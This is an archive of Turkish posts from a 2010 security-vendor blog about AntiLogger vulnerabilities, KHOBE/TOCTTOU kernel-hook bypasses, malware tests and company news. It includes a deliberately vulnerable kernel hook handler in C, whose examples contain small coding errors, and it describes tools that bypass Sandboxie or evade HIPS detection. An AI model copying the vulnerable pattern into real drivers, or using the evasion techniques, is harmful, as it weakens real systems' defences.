Zemana Blog

Local Privilege Escalation Vulnerability (UPDATE)

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Tue, 03 Aug 2010 11:20:00 +0000

Burada bahsettiğimiz açığın , 1.2.9.206 sürümleri içindede (CNET) bazı hatalı driver (AntiLog32.sys 1.5.2.755) sürümünün bulunduğu rapor edildi bu yüzden v1.9.2.208 sürümüne güncellemeniz önerilir.

Zemana AntiLogger AntiLog32.sys Local Privilege Escalation Vulnerability

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Wed, 28 Jul 2010 12:10:00 +0000

Sık sık ziyaret ettiğim Offensive Security'nin Exploits Database sitesinde, bugün Local Exploitler'ın en üstünde kendi programımıza ait bir exploit ile karşılaştım, şimdiye kadar AntiLogger için irili ufaklı bir çok exploit rapor edilmişti ancak bu aralarında en ciddi olanı diyebilirim ve hemen dev team ile irtibata geçtim, onlarda açığı teyid ettiler ancak son sürümü etkilememesi bize rahat bir nefes aldırdı. Eski sürümü kullananların acilen güncelleme yapmaları gerekiyor!

Çünkü bu exploit sayesinde, local hostunuzdaki kısıtlı kulanıcılardan biri admin yetkilerine ulaşabilir, poc'daki kod, komut istemcisini admin yetkileri ile çalıştırıyor.

Açığa sebebiyet veren, AntiLoger'in kernel driver'ında kullanılan bir özellik. Bu özellik, AntiLogger GUI'nin gerektiğinde administratör yetkilerine ulaştırılabilmesine yarıyordu. Ancak bu özellik Vista kernel'inde kaldırıldığı için AntiLogger'dada kullanımından vazgeçilmişti.

NtSetInformationProcess API'sine ProcessInformationClass = ProcessAccessToken verilmesi ile kısıtlı haklara çalışmakta olan bir process, admin yetkilerine ulaştırılabiliyordu, Vista kernel değişiklikleri ile beraber token impersonate işlemi sadece process çalıştırılmadan önce yapılabilir hale geldi. UAC'in mekanizmasında olduğu gibi.

Gmail Spam Filter

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Fri, 02 Jul 2010 08:30:00 +0000

Ara sıra üstteki resimde görüldüğü gibi phishing mailler alıyoruz, bunlara, ekibimizdeki birçok kişi kanmasada, pazarlama bölümümüzdeki gibi teknik konulardan uzak departmandaki takım arkadaşlarımız kanabiliyorlar ve onların mail hesabının hack edilmesi bizide etkiliyor. Mesajda kullanılan sosyal mühendislik çok iyi olduğundan bir çok kişinin buna inanması çok yüksek ve bunu, Gmail spam filtresinin aşsağıdaki kodda olduğu gibi basit bir şekilde engelleyebilmesi gerek.

Gmail Spam filtresinin aslında çok kuvvetli olmasına rağmen, bunun gibi bir durumu engellemesinin altında bir false positive var gibi?

Sizce bu koşulda spam olarak işaretlenmeyecek zararsız bir içerik nasıl olabilir, varsa örneklerinizi bekliyorum.

Hatırlatma: Geçenlerde ortaklığımızı ilan ettiğimiz Commtouch, bu ve bundan çok daha sinsice, tabiri caiz ise şeytanın bile aklına gelmeyecek koşulları analiz edip durdurabiliyor.

Online Banking / Browser Security Test

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Tue, 29 Jun 2010 11:24:00 +0000

Bağımımsız malware araştırma grubu MRG, 30 gün sürecek bir test başlattı ve hergün listesindeki tüm güvenlik programlarını, kendilerinin yazdığı bir spyware ile deniyorlar. Eğer spyware başarılı olursa, paypal şifrelerini, güvenlik duvarını aşarak kendi merkezine yolluyor. (Real-time bakılabilmesi için kendi merkezlerinide public etmişler)

30 gün test etmelerindeki amaçta, güvenlik programlarının kendilerini geliştirip (heuristic,behavioral yada signature tabanlı) kaçıncı günde tepki verip durdurabildiğini görmek. Bu testin içine bizide dahil etmişler ve ilk günden beri en iyi sonucu alan biziz, umarız 30 gün boyuncada böyle devam eder.

AntiLogger'in direk olarak Browser koruması odaklı olmadığı halde bu kadar lider güvenlik üreticisinin önüne geçmesi bize çok büyük motivasyon verdi.

Rapora buradan ulaşabilirsiniz.

Zemana blog erişim problemi

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Tue, 29 Jun 2010 10:02:00 +0000

Son dönemdeki Google ip adresleriyle yaşanan sıkıntıdan malesef bizde payımızı aldık.

Bloğumuzun alan adı üzerimizde olmasına karşın aslında Google'ın (Blogger) sunucularında host ediliyor ve DNS çözümlemesini CNAME ile yapıyorduk ve kullandığımız CNAME ghs.google.com'in şu an için çözümlemesi 74.125.43.121 olarak çıkıyor ve bu Ip adresi Türkiyeden bloklanmış durumda bu yüzden çözümleme işlemini, DNS sistemimize direk A tipi record (74.125.77.121) girerek yaptık ve ilgili Ip şu an için blok edilmediğinden bloğumuz tekrar açıldı.

Hernekadar sorun şimdilik çözülmüş gibi gözüksede aslında bu geçici ve stabil olmayan bir çözüm çünkü CNAME yerine A record girmiş oluyoruz ve ileride Google ilgili Ip adresinde bir değişiklik yaparsa tekrar sorun yaşarız. Umarız bu zaman zarfında Google Ip adresleri ile olan sorun çözülür çünkü bloğumuzu güvenlik nedeni ile kendi sunucumuzda host etmek istemiyoruz.

Famous Why, Zemana Interview

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Thu, 17 Jun 2010 08:08:00 +0000

FamousWhy portalı bizi ünlüler listesine aldı ve ufak bir reportaj verdik.
Thanks guys :)

AntiLogger - TopTenREVIEWS Video

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Wed, 02 Jun 2010 06:55:00 +0000

Daha önce bahsetmiş olduğumuz TopTenREVIEWS, AntiLogger için bir Video yayınladı.

TopTenREVIEWS, "We Do The Research So You Don't Have To"

Zemana - Commtouch Teknoloji Ortaklığı

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Wed, 26 May 2010 13:05:00 +0000

Anti-Spam, Anti-Phishing ve Content Filtering konularında endüstri lideri olan Commtouch ile teknolojik işbirliği gerçekleştirdik. İşbirliği kapsamında, Zemana Internet Security ve Zemana Endpoint Protection, aşşağıdaki Commtouch teknolojilerini kullanacak.

Anti-Spam, Zero-Hour ™
Zero-Hour™ Virus Outbreak Protection
GlobalView™ URL Filtering
GlobalView™ Anti-Phishing
GlobalView™ Zombie Intelligence Service

Belki Commtouch ismini duymayanlarız olabilir ancak kullandığınız AntiVirüsler'den tutunda ISP'nize ,mail servis sağlayıcılarınıza kadar bir çok yerde Commtouch teknolojilerini kullanıyorsunuz.

Commtouch teknolojileri ile Anti-Spam ve Content Filtering alt yapısını oluşturan firmalara örnek verirsek; 3Com, Check Point, F-Secure, NETGEAR, Nexus, Panda ,WatchGuard, G-Data ve daha bir çok lider yabancı şireketin yanında Türkiyeden bile MYNET'i sayabiliriz.

Kısaca, Commtouch 1991'den beri 40 milyonun üzerinde müşterisi ile Internetin Anti-Spam omurgasını oluşturuyor. Zemana iş geliştirme müdürümüz Velislav Daskalov şöyle diyor "Alanında, Commtouch'a rakip olacak başka bir firma olmadığı için kararımızı çok kolay verdik."

Basın bültenini okumak için tıklayınız.

AntiLogger, banker trojan'a karşı

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Wed, 26 May 2010 10:38:00 +0000

MRG (Malware Research Group), güvenlik yazılımlarını test etmek için gerçek bir malware yazdı. Simülasyonların aksine, bu zararlı tamamen gizli çalışıyor ve infecte ettiği sistemlerde HSBC online bankacılık şifrelerini toplayıp uzak bir merkeze gönderiyor. "AntiLogger, sadece simulasyon programları için optimize edilmiş" gibi cümlelerle bizi eleştirenlere de, aşşağıdaki tablonun güzel bir yanıt olacağını düşünüyoruz.

Raporun tamamına ulaşmak için tıklayınız.

Zemana AntiLogger ranked #1 on TopTenREVIEWS

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Wed, 26 May 2010 10:02:00 +0000

Amerika'nın en önde gelen yazılım inceleme kuruluşu TopTenREVIEWS, Zemana AntiLogger'i kendi katogorisinde 1 numara seçti. İnceleme yazısına buradan, karşılatırmaya ise buradan bakabilirsiniz.

Türkler'e karşı önyargılı olmadıkları ve bu denli güzel aksyionları için kendilerine sonsuz teşekkürler.

Zemana Anti-Sound Recorder Technology

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Wed, 26 May 2010 09:26:00 +0000

Alanımızdaki rakiplerimizin artış göstermesi ve bu teknolojiyi kullanmaları bizide harekete geçirdi ve AntiLogger 21 mayıs güncellemesinde, microfonların uzaktan dinlenmesini engelleyecek sistemi, programımıza dahil ettik.

Sayın Baykal'a yapılan kaset komplosuna benzer salrırıların, bilgisayarlar ile hacker'lar tarafından rahatça yapılabileceğini düşünürsek, AntiLogger, sezgisel Anti-Webcam ve Anti-Sound recorder modülleri ile bu saldırılara karşı biçilmiş kaftan oluyor. Sezgisel diye üzerine başıyorum çünkü bu denli profesyonel saldırılarda kullanılacak casus yazılımların, Antivirüsler gibi signature-based sistemlere yakalanma ihtimali sıfır.

KHOBE - 8 şiddetinde deprem

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Mon, 24 May 2010 13:10:00 +0000

Bağımsız test kuruluşu Matousec, geçen hafta bu başlık ile güvenlik sectörüne çok yankı getirdi. İlgili zafiyet, güvenlik sistemlerinin, kernel hook'larının, multiprocessors işlemcilerde bypass edilmesine olanak veriyor. Bu konu aslında yeni değil ve kesefedende Matousec değil, ancak yaptıkları özel araştırma ve kuvvetli bir başın bülteni ile bu konuyu önemsemeyen (biz dahil) birçok güvenlik üreticisini harekete geçirdi. Bir kısım işletim sistemini suçladı bir kısım ise konunun karmaşık ve zor olması nedeni ile şimdiye kadar bu zafiyeti kullanan zaralı çıkmadığı ve önlem almayacaklarını belirttiler. Matousec'ın, üreticiler ile iletişime geçmeden bunu internete taşıması ve çözümü paylaşmak için ücret talep etmeside işin tuzu biberi oldu.

Bizde bu açığı kullanan herhangi bir zararlı ile karşılamadık ancak bu durum, bu konun gerçek olmadığını ve özellikle bu bültenden sonra kullanılamayacağı anlamına gelmediği için 21 mayısta yaptığımız güncellemede (1.9.2.205) önlemimizi aldık. Bu kadar hızlı önlem almamızda rol oynayan, AntiLogger'ın ckirdeğini geliştiren takımın bulduğu süper kolay çözüm oldu.

KHOBE bir diğer adı ile TOCTTOU (time-of-check-to-time-of-use) zafiyeti nedir?

Kernel SSDT hook çağrılarındaki parametrelerin, çok hızlı bir şekilde başka bi thread tarafından fake edilmesidir. Örneğin ring3'te çalışan bir uygulama, zafiyeti olan bir güvenlik programının kontrol altında tuttuğu bir fonksyona ilk önce zararsız bir parametre gönderip, bu pointerin kontrol edilmesi ile orjinal çağrıya yönlendirilme aşamasında başka bir thread tarafından aynı parametrenin içeriğini zararlı bir değer ile değiştirebilir.

Zafiyet bulunduran bir hook handler'a basit bir örnek verelim:

NTSTATUS HookedTerminateProcess(PDWORD pdwPid)
{
    if( *dwPid == AntivirusPid )
   {
       // -> Guvenlik programinin, parametreyi kontrol ettigi satir
       //self defense
        return STATUS_ACCESS_DENEID;
    }
    else
    {
        // -> Saldirinin gerceklestigi satir
        return OriginalTerminateProcess(pdwPid);
    }
}

Birinci thread, kontrolden geçebilecek bir ProcessId gönderiyor, ve hemen bu kontrolden sonra ikinci thread, ilgili parametreyi güvenlik programının kendi ProcessId'sı ile değiştiriyor ve güvenlik programını kill ediliyor. Mümkün değil! ama nasıl? nezaman? dediğinizi duyar gibiyim :)

S: İlgili parametre kernel stack'a push ediliyor, nasıl olurda bunu ring3'ten değiştirebilir?
C: Evet pointer kernel stack'ta ve sadece ring0 tarafından değiştirebilir ancak pointerin, point ettiği hafıza alanı hala ring3'te.

S: Sadece 2-3 opcode var ve nano saniyeler içinde çalıştırılacak, nasıl olurda tam bu zaman aralağında atak yapılabilir.
C: Bu hook handler, sadece basit bir örnek, pratikte bu handler'lar çok karmaşık ve birçok koşul ve döngüden oluşuyor, ve atak için fazlasıyla opcode ve zaman oluşuyor

S: Tek işlemcili sistemlerde kernel Hook handler'da threat context switch gerçekleşmez?
C: Hernekadar azda olsa, gerçekleşme ihtimali var çünkü SSDT servisleri adı üstünde (System Service Dispatch Table) IRQL <= DISPATCH_LEVEL seviyesinde çalışıyor ve dokümantasyona göre bu level'de CPU'ya ve başka bir çok değere bağlı olarak thread context switch gerçekleşebiliyor.
Windows Internals (Thread Scheduling)
MSDN (Scheduling, Thread Context, and IRQL)

S: Eğer parametre pointer değilse, örneğin HANDLE ise bu durumda risk varmi?
C: Her nekadar kendi denemelerimizde bunu ispatlayamadıysakta, Matousec'a göre teorikte mümkün; İşletim sistemenin HANDLE değerlerini rastgele değilde, belli bir havuzdan oluşturduğunu iddia ediyorlar; bir handle kapatıldıktan hemen sonra, farklı erişim izinleri ile aynı değere sahip başka bir handle tahsis edilebiliyor. Bu durumda zararsız görünen bir handle oluşturuluyor ve kontrola sokuluyor, tam bu sırada ikinci thread bu handle'i kapatıp brute force ile aynı değere sahip yeni bir handle alıyor.

AntiLogger'in çekirdeğini geliştiren takım şefimiz söyle diyor; "Aslında ne yazdığını bilerek kernel kod yazan bir programcı daha önceden hiç KHOBE metodunu duymamış olsa bile doğal olarak bu durumu görüyordur, ancak önlem alınması ve kötüye kullanılması çok zor olduğu için pass geçiyorlar, aynı benimde geçtiğim gibi"

S: Peki önlem alınması neden çok zor? Shophos,AVG,CA gibi isimler nasıl olurda hala bir yama yayınlamazlar? Ben çözümü buldum bile?
C: İlk etapta akla ilk gelen çözüm ve aynı zamanda en doğru çözüm, ring3'den gelen parametlerin, ring0 da bir kopyasını oluşturmak ve kontrolu + orjinal çağrıyı bu kopya ile yapmak. Bir çoğumuz gibi sizinde aklına bu geldi tahmin ediyorum :) Evet, bu dediğimiz tam bir çözüm ancak gerçek senaryoda 50'den fazla hook handler ve bazılarının 15'ten fazla parametresi bulunuyor ve bu parametreler PDWORD gibi basit pointerler değil, bir çoğu undocumented structor pointerleri ve işletim sisteminden sistemine farklılık gösteriyorlar, bunlar için doğru hafıza alloc etmek geri dönüş değerlerini doğru konumlanmdırmak, hafıza alanlarını temizlemek vs aylarca çalışma ve test gerektiriyor çünkü en ufak bir hatada tüm sistem çökme riski ile karşı karşıya kalabilir.

Bu bahsettiğimiz çözüme örnek verelim:

NTSTATUS HookedTerminateProcess(PDWORD pdwPid)
{
    DWORD dwMyPid = *dwPid;
    //dwPid ile isimiz bitti ve tekrar kullanmadigimiz icin bu risk %100 ortadan kalkmis oluyor
    if( *dwMyPid == AntivirusPid )
    {
        // -> Guvenlik programinin, parametreyi kontrol ettigi satir
        //self defense
        return STATUS_ACCESS_DENEID;
    }
    else
    {
        // -> Saldirinin gerceklestigi satir
        return OriginalTerminateProcess(dwMyPid);
    }
}

Eğer bu türde basit hook handler'larımız olsa idi, bu çözüm kesinlikle en iyisi olurdu. Şimdi bizim kullandığımız çözümden bahsedeyim. (Büyük ihtimalle matousec'in çözümüde bu şekildedir diye tahmin ediyoruz)

İlgili hook handler çağrıldığında , çağran thread'in ID'si ile parametreler harmanlanıp bir hash elde ediyoruz ve ilgili kontroller yapıldıktan sonra, orjinal servis çağrılmadan hemen önce bu hash tekrar oluşturup kontrol ediliyor.

NTSTATUS HookedTerminateProcess(PDWORD pdwPid)
{
    PCHAR szHash = GetHash(pdwPid+PsGetCurrentThreadId());
    ntStatus = STATUS_SUCCESS;

    if( *dwPid == AntivirusPid )
    {
        // -> Guvenlik programinin, parametreyi kontrol ettigi satir
        //self defense
        return STATUS_ACCESS_DENEID;
    }
    else
    {
        KeEnterCriticalRegion();
        // -> Saldirinin gerceklestigi satir
        if( AdditionalCheck(szHash,pdwPid,PsGetCurrentThreadId()) )
        {
            ntStatus = OriginalTerminateProcess(pdwPid);
        }
        else
        {
            //KHOBE detected
            ntStatus = STATUS_ACCESS_DENEID;
        }
        KeLeaveCriticalRegion();
        return ntStatus;
    }
}

S: Bu çözüm %100 khobe'i engelliyebilirmi?
C: Hayir ancak %99 oraninda riski azaltir cunku OS'de toplamda 500'den fazla, kernel de ise yüksek öncelikli 20'den fazla çalismayi bekleyen DPC ve thread var.

S: Bu çözümü sizden önce bu kadar büyük ölçekli firmalar neden akıl edemedi?
C: Önemli olan nicelik değil, "nitelik" :)

Shophos - Khobe "vulnerability" – no earth shaker
F-Secure - KHOBE Not So High On The Richter Scale
ESET - Khobe-Wan: These Aren’t the Droids You’re Looking for.
GDATA - KHOBE - no problem

AVEA Mobil ödeme ile Zemana AntiLogger

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Wed, 14 Apr 2010 12:46:00 +0000

Ayrıcalıklı servisler sunmaya devam eden Avea, "Avea Mobil Ödeme" servisini kullanıma açtı.

Turkcell gibi artik Avea aboneleride, herhangi bir kayıt veya işlem yapmadan, Zemana AntiLogger'ı %20 indirim ile sadece 20TL'ye tek bir SMS ile satın alabilecekler.

Avea Mobil Ödeme hakkında daha fazla bilgi için tıklayın!.

Escape From PDF modified by Zemana

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Wed, 07 Apr 2010 19:30:00 +0000

PDF security specialist Didier Stevens of Belgium discovered a functionality defined in the PDF specification, which is launch a command and run an executable within a PDF file without JavaScript.

We modified Didier Stevens's PDF /Launch PoC in order to demonstrate that it is possible to make a PDF to download and execute a malware. Watch the video!

Foxit Reader users please not that it issues no warning when launching a command!

Really there's some crazy stuff in the PDF specification

Zemana V8 Supercars

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Thu, 18 Mar 2010 17:58:00 +0000

Eski bir Formula pilotu olan Aaren Russell'den çok umutluyduk ancak iki pilotumuzda malesef yarışlarda iyi bir derece elde edemedi :(

Slideshow'u izlemek için tıklayın.

MRG Online Bankacılık ve Tarayıcı Güvenlik Testi - Mart 2010

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Thu, 18 Mar 2010 11:09:00 +0000

MRG (Malware Research Group), dünyaca ünlü 10 sesgisel güvenlik programı ile bağımsız bir test yaptı. Testin amacı, sanal bankacılık işlemlerinde, güvenlik programlarının, tarayıcıyı ve şifreleri ne denli koruduğu.

10 program içinde birinciliği PrevX'e kaptırıp ikinci olduk. PrevX işini çok iyi yapan bir firma, hatta yakında kendileri ile bir takım ortaklıklarımız olacak. Yinede bu skor bizim için çok iyi çünkü test sadece internet tarayıcılar üzerinde oldu, yoksa AntiLogger sadece tarayıcıları değil, e-mail client'ler den VPN araçlarına kadar çok geniş bir yalpazeyi koruma kapsamına alıyor.

Bu test, 2 hafta önce olsaydı, birinci biz olacaktık ancak bu testten önce, Anti-SSL teknolojimizi PrevX ile paylaştık ve onlarda SSL zararlılarına karşı, SafeOnline v3.0.5.74 sürümünden itibaren koruma sağlamaya başladılar ve testte puan kaybetmediler.

Puan kaybettigimiz nokta ise, çok karmaşık bir kernel keylogger yüzünden oldu. İlgili keylogger, yapısı itibari ile sadece PS/2 arayüzünü kullanan klavyeler ile çalışabiliyor ve günümüzde popülar olan USB klavyeler ile çalışmıyor ama tabiki ilerki sürümlerde bu zararlıya karşı önlem alacağız.

MRG'nın tam raporuna buradan ulaşabilirsiniz.

UPDATE: MRG testlerindeki ilgili açıklar AntiLogger 1.9.2.196 (Monday, March 22, 2010) sürümünde kapatıldı, güncellemeleri yapmanızı önemle tavsiye ederiz.

Zemana - SoftPedia Ortaklığı ile AntiLogger Hediye

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Wed, 17 Mar 2010 12:10:00 +0000

Crack kullanımın azaltmak ve aynı zamanda marka bilinirliğimizi arttırmak için dunyaca ünlü Softpedia ile bir anlaşma yaptık. Bu anlaşma kapsamında, Zemana AntiLogger 1 hafta boyunca 1 yıllık ücretsiz olarak kullanıcılara hediye ediliyor.

Yaptığımız anlaşmada, Softpedia, sitede heryerde dönenecek bir baner koydu, ve bu zaman zarfında, haftanın en iyilerinde birinci sırıya Zemana AntiLogger'i aldı ve ek olarak çok olumlu ve derin bir değerlendirme yazısı yazıp en üstte tuttu.

Aynı zamanda binlerce sitede ilgili promasyon yayınlandı ve neredeyse mevcut kullanıcılarımızın yarısı kadar bir download gerçekleşti.

Softpedia'nin hitlerinin çok iyi olduğunu tahmin ediyorduk ancak bükadarını beklemiyorduk. Romanialı download sitesi bizi çok şaşırttı!!!

Bu ortaklıkta Softpedia'nın ne kazancı var diye soruyorsunuzdur? Tüm bu download'lardan geri dönecek satışlarda %50 ortaklığı var :)

Umarız illegal kullanımının bir nebze olsada bu şekilde önüne geçmiş oluruz.

Kampanyanın bugün son günü, geç kalmadan ücretsiz sürümü indirebilirsiniz.

Sandboxie Bypass (x64)

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Fri, 12 Mar 2010 15:51:00 +0000

Daha önceki yazımda x64 için, şu anda bu türde korumaların olamayacağından bahsetmiştim. Ve sandbox yazılımlarının arasında en güvenilir olan sandboxie programını, x64 sistemde bypass eden bir örnek uygulama yapacağımı söylemiştim, buradan download edebilirsiniz. Yapmanız gereken uygulamayı sandboxie içinde çalıştırmak ve onay vermek. Uygulama Sandboxie'yi hemen kapatacaktir.

NOT: Sadece Windows 7 x64(Intel) üzerinde test edilmiştir. Vista'da yada AMD işlemcilerde çalışmayabilir.

NOT: x86 Sandboxie kullacılarının endişelenmesine gerek yok, Sandboxie bu tür yöntemler ile x86 sistemler üzerinde kolay kolay kill edilemez.

Windows 64 bit Sistemlerde Savunma

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Thu, 11 Mar 2010 18:03:00 +0000

Bize son zamanlarda en çok gelen soru; Neden AntiLogger x64 desteklemiyor?

Microsoft 64 bit işletim sistemlerinde, rootkit'leri önlemek için PatchGuard adında bir sistem geliştirdi. PatchGuard, Windows kernel'de herhangi bir değişiklik yapılıp yapımadığına bakıyor ve eğer değişiklik yapılmış ise sistemi çökertiyor(BSOD). Kernel tabanlı rootkit'ler , sistemde gizlenebilmek için çekirde bir dizi değişiklik yapmak zorunda olduğu için x64 üzerinde çalışamıyorlar. Aynı zamanda AntiLogger gibi proactive koruma yapan programlarda, sistemde olup biteni takip edebilmek için değişiklik yapmak zorunda ve doğal olarak bunu yapamadığı için x64'de çalışamıyor.

PatchGuard, kernel'de aşsağıdaki bölgeleri kontrol altında tutuyor:
System service tables (SDT).
Interrupt descriptor table (IDT).
Global descriptor table (GDT)
Kernel stack & heap (Bunun için donanım desteği, dahada doğrusu AMD64 işlemci gerekiyor )

Başta Symantec olmak üzere tüm endüstri liderleri, en başından beri PatchGuard'a karşı çıktılar ve Microsoft'un bu politikasını değiştirmesini yada sadece sertifikalı güvenlik üreticilerinin kullabileceği bir SDK yapmasını istediler. Bu baskılar sonucunda Microsoft , Vista SP1'den sonra bir dizi SDK geliştirdi. Ancak bunlar çok yetersiz kaldı, çünkü SDT üzerinde IPC'den LPC'ye kadar 500'den fazla, servis(API)'si bulunuyor ve bunların hepsini, kernel'i modifie etmeden kontrol etmek mümkün olmuyor.

Symantec, daha PatchGuard çıkmadan , bunu hackerlerin bypass edeceğini söylemişti ve nitekim öylede oldu. Rootkitler PatchGuard'i bypass edilebiliyorlar. Yani PatchGuard sadece güvenlik üreticilerini durdurdu!!! Şimdi içinizden soruyorsunuzdur; neden güvenlik üreticileride, rootkitler gibi PatchGuard'i bypass edip çalışmıyorlar? Çünkü Microsoft uyarıyor:

"Yeni bir güncellemede, PatchGuard mekanizmasını değiştirebiliriz ve kernel'i modifie olmuş sistemler çökerler"

Bu durumda, ilgili rootkit yüklü olan makinaların hepsi mavi ekran verecek ve rootkit, sistem başlıngıcında başladığı için bilgaşayar format atılmadan tekrar açılamayacak.

Tabi rootkit yazarları için bu bir endişe değil, onlar zaten zararlı yazıyorlar ve ileride bu makinaların çökmesini umursamıyolar. Ancak bizler böyle bir riski kesinlikle göze alamayız.

PatchGuard bypass edilmeden, belli bir yere kadar koruma sağlanabiliyor ancak güvenli değil, örneğin en popüler ve en güvenli sandbox uygulaması olan Sandboxie'nin şimdiye kadar x64 desteği yoktu ancak üyelerinden öyle bir tepki aldılarki, 64bit desteğini vermek zorunda kaldılar tabi bunu PatchGuard bypass ederek değilde, bir takım User Mode hook destekleri ile yaptılar ve heryerde de açıkladılar 32bit kadar güvenli olmadığını.

Bende bir Sandboxie fanatiği olarak, Sandboxie'in 64 bit sürümü çıktığı gibi şöyle bir göz attım ve bypass etmek için ne yapmam gerektiğini saniyeler içinde anladım, henüz teoride ne yapacağımı bilsemde, pratikte uygulamayı yazmadım ama ilerleyen günlerde yazıp sizinle paylaşacağım. Bu uygulamayı yazarsam Sandboxie'e rapor etmeme gerek yok çünkü bir exploit veya açık değil, ama 32bit sanboxie için bunu yapabilsem bu bir exploit olur ve sadece üreticiye bildirirdim.

Şandboxie yazarları, gerçekten çok ileri Windows kernel cambazları, x86 sürümünü bypass etmek için bir çok kere deneme yaptım ve başaramadım, başaranıda henüz görmedim.

Özetlemek gerekirse x64 üzerinde sezgisel(proactive) HIPS,Firewall,Sandbox yada benzeri koruma şu an için %100 mümkün değil. Ancak çok yakında, Microsoft buna bir çare üretecektir ve ozaman bizde x64 AntiLogger'i yayınlayacağız inşallah.

Zemana Extreme Leak Test Runner

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Thu, 11 Mar 2010 15:21:00 +0000

Yeni bir simulasyon aracı geliştirdik. Bu aracın kendisi direk bir Leak Test değil ancak diğer Leak Tesler ile kullanıldığında, ilgi teslerin güvenlik programlarınca yakalanmasını güçleştiriyor.

Örneğin bu araç ile AKLT testini başlatırsanız, görüceksinizki, AKLT'yi daha önceden yakalayabilen bir çok HIPS(Anti Keylogger etc.) bu şekilde yakalıyamıyacak.

NOT: Program özellikle Windows XP için optimize edildi. Vista ve Windows 7'de çalışabiliyor ancak XP'de olduğu kadar iyi sonuç vermiyor bu yüzden testlerinizi XP üzerinde yapmanızı tavsiye ederiz.

Programın çalışmasını kısaca özetlemek gerekirse; çalıştırdığı programın orjinal yolunu microsoft imzalı bir dosya gibi gösteriyor, bu da bir çok HIPS programını yanıltıyor.

Programı, bizim kendi simülasyon teslerimiz ile de deneyebilirsiniz.
AntiLogger 1.1.2.416 (30.06.2008) sürümden beri bu tür saldırıları onliyebiliyor.

DOWNLOAD

We would like to present to you a new leak test tool called Zemana Extreme Leak Test Runner.
This tool itself is not a leak tester, instead it makes your favorite leak tester to be harder to detect by security solutions. Currently, full functionality is available only on XP. It also runs on Vista and Windows7 but with some limitations. For best results, you must test it on XP systems. Later we will release full functional version for Vista and Windows7. You can use this tool with our leak tests, AKLT or any other tests.

Zemana V8 Supercars are Ready

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Wed, 10 Mar 2010 11:35:00 +0000

Daha önce bahsetmiş olduğum Zemana-V8 arablar hazırlandı. Fotoğraflara buradan bakabilirsiniz. Yarışlar bugün başlıyor ve 4 gün sürecek, ilerleyen zamanlarda da videoları paylaşacağım.

Türkiyede HTTPS/SSL Hırsızlığı (Part1)

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Thu, 04 Mar 2010 09:18:00 +0000

Rutin analizler sırasında, bir spyware'da SSL logger özelliğine rastladım. (Bizim SSL-Logger simülasyonunda kullandığımız metod) spyware'in yaptığı, Facebook'tan tutunda banka hesaplarınıza, yaptığınız alışveriş sitelerindeki şifrelerinize hatta tüm Yahoo Messenger ve MSN messenger şifrelerinize kadar almak.

Bazı yerlerde Youtube yasağını kaldırıcak bir program olarak lansa edilmiş ve gerçektende DNS değiştirerek bu yasagı kaldırıyor, buda programın çalışıtığını ispatlamasını sağlıyor. İşin en ilginç kısmı ise bunun tamamen bir Türk tarafından yapılması, bunu sadece hedef aldığı sistem için söylemiyorum aynı zamanda programda kullanılan değişken isimleri dahil Türkçe. Programda, SSL logger dışında, keylogger vs gibi başka hiç bir component yok, tamamen SSL trafiğine focus olmuş durumda, bu da tehlikenin ne derece yüksek olduğunu gösteriyor.

SSL logger işleminin bilinmemesinden dolayı şimdiye kadar bu metodu sadece 6-7 tane banker worm'da görmüştük ancak bundan sonra home made trojanlarda dahil görmeye başlayacağız demekki.

Diğer Antivirüs firmalarımdaki arkadaşlarımdan, Türkiyeden bu spyware'a ait nekadar infeksyon saptadıklarını sordum ve sonuç korkutucu. Her gün ~1500 yeni infeksyon.

Bu programın yuklenmesinden, bilgileri çalana kadar tüm hamleleri AntiLogger tarafından durduruluyor hatta alarmları, yanlışlıkla onaylananlara da bir şey olmuyor çünkü Anti-SSL özelliği için, AntiLogger, kullanıcıya sormadan direk bloke ediyor çünkü hiç bir legal program tarafından bu özellik kullanılmıyor. Tek dikkat etmeniz AntiLogger özellikler kısmında Anti-SSL teknolijisi aktif olmalı.

Hatta eğer bir Intel netbook sahibi iseniz Intel AppUp store'dan ücretsiz olarak yayınladığımız "Secure Banking" uygulamasını kurarak bu ve benzer tehditlere karşı proactive olarak korunabilirsiniz. "Secure Banking" programını toplu olarak işletmelerede kurabilirsiniz çünkü hiçbir kullanıcı onayı istemeden ve pop-up göstermeden sessizce işini yapıyor.

Programcısı release versionda OutputDebugStringA fonksyonunu kaldırmayı unutmuş ve Dbgview ile çaldığı trafiği üstteki resimdeki gibi görebiliyoruz.

Spyware herhangi bir rootkit modülu taşımadığı için, task manager'dan görüntülenebiliyor ve eğer TranslatorSrv.exe isminde bir process çalışıyorsa makinanıza bulaşmış anlamına geliyor. Tabi bu isim bir diğer varyonlarından farklı olabilir.

Not: Program, bağlanığı master server'lardan kendini ve programcısını afişe ediyor. Bu bilgiler gerekli birimlerde istendiği taktirde verebiliriz. (emergency [at] zemana.com)

F1 Tuşuna basmayın!!!

erkan.arnaudov@zemana.com (Erkan Arnaudov) — Tue, 02 Mar 2010 18:18:00 +0000

iSEC Security Research tarafından, XP sistemleri etkileyen 0 günü açığı ve exploiti yayınlandı.

Aslında rapora bakılırsa iSEC bunu 2007'de Microsoft'a rapor etmiş, tahmin ediyoruz uyumluluk sorunları yüzünden yama kapatılamamış ve yakin zamanda kapatılacak gibi durmuyor.

